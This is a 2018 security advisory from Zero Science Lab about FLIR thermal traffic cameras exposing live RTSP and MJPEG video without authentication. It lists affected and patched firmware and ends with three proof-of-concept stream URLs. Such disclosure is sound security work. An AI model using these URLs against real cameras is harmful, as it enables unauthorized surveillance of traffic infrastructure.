FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure

Posted Oct 8, 2018
Authored by LiquidWorm | Site zeroscience.mk

FLIR Systems FLIR thermal traffic cameras suffer from an RTSP stream disclosure vulnerability.

tags | exploit
SHA-256 | f65f2f6d488c81f677bcd9bbadf582687ea5b1b17b888d215e2c7c4ce7ea981a


Vendor: FLIR Systems, Inc.
Product web page: https://www.flir.com

Affected firmware version: V1.01-0bb5b27 (TrafiOne)      Codename: TrafiOne
                           E1.00.09      (TI BPL2 EDGE)  Codename: TIIP4EDGE
                           V1.02.P01     (TI x-stream)   Codename: TIIP2
                           V1.05.P01     (ThermiCam)     Codename: ThermiCam
                           V1.04.P02     (ThermiCam)     Codename: ThermiCam
                           V1.04         (ThermiCam)     Codename: ThermiCam
                           V1.01.P02     (ThermiCam)     Codename: ThermiCam
                           V1.05.P03     (TrafiSense)    Codename: TrafiSense
                           V1.06         (VIP-IP)        Codename: VIP-IP
                           V1.02.P02     (TrafiRadar)    Codename: TrafiRadar

Vendor patched firmware version:

Product name              Firmware    Released
----------------------------------------------------
ThermiCam / TrafiSense    E1.06.03    17.09.2018
TI BPL2 EDGE              V1.00       17.09.2018
TI x-stream               E1.03.02    17.09.2018
TrafiOne                  E1.02.02    17.09.2018
----------------------------------------------------

Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
and dynamic traffic signal control. Offered in a compact and affordable
package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
adapt traffic signals based on the presence detection of vehicles, bicycles
and pedestrians while at the same time generating high resolution data at
intersections and in urban environments. FLIR TrafiOne helps traffic engineers
to improve traffic flows, reduce vehicle idling time, monitor congestion,
enhance safety for vulnerable road users, collect data and measure travel and
delay times for different transport modes.

FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
video detector in a single unit. FLIR TrafiCam detects moving and stationary
vehicles at signalized intersections. Via detection outputs or via IP protocol,
vehicle presence information is transmitted to the traffic controller so that
signal timing can be adjusted dynamically. This way, vehicle waiting time at
traffic lights is reduced and traffic flows are optimized.

FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
detection. TrafiSense does not need light to operate, but uses the thermal energy
emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
and bikes in the darkest of nights, over a long range and in the most difficult
weather conditions. The result is reliable, 24/7 traffic detection for a wide
range of applications.

FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
radar. TrafiRadar is typically used for stop bar and advance vehicle presence
detection, traffic adaptive systems, and dilemma-zone protection and thus improves
traffic safety and efficiency at signalized intersections. TrafiRadar will warn
traffic light controllers whenever a vehicle is present in the dilemma zone, either
extending green or red lights to improve overall safety.

[...] and stationary vehicles at
signalized intersections and collect traffic data at intersections or interurban
roads. Via detection outputs or via IP protocol, vehicle presence information is
transmitted to the traffic controller so that signal timing can be adjusted
dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
used for traffic monitoring in a control room.

The VIP series offers multi-functional Video Image Processing modules for traffic
control. VIP boards integrate automatic incident detection, data collection,
recording of pre and post incident image sequences and streaming video in one
board. VIP modules have been installed for road and tunnel projects all over the
world.

Desc: FLIR thermal traffic cameras allow unauthenticated and unauthorized access
to the live RTSP video stream.

Tested on: nginx/1.12.1
           nginx/1.10.2
           nginx/1.8.0
           Websocket/13 (RFC 6455)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - https://www.zeroscience.mk


Advisory ID: ZSL-2018-5489
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php

Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf


01.08.2018

--


PoC:

1. http://192.168.1.1/live.mjpeg?id=1
2. rtsp://192.168.1.1/mpeg4
3. http://192.168.1.1/snapshot.jpg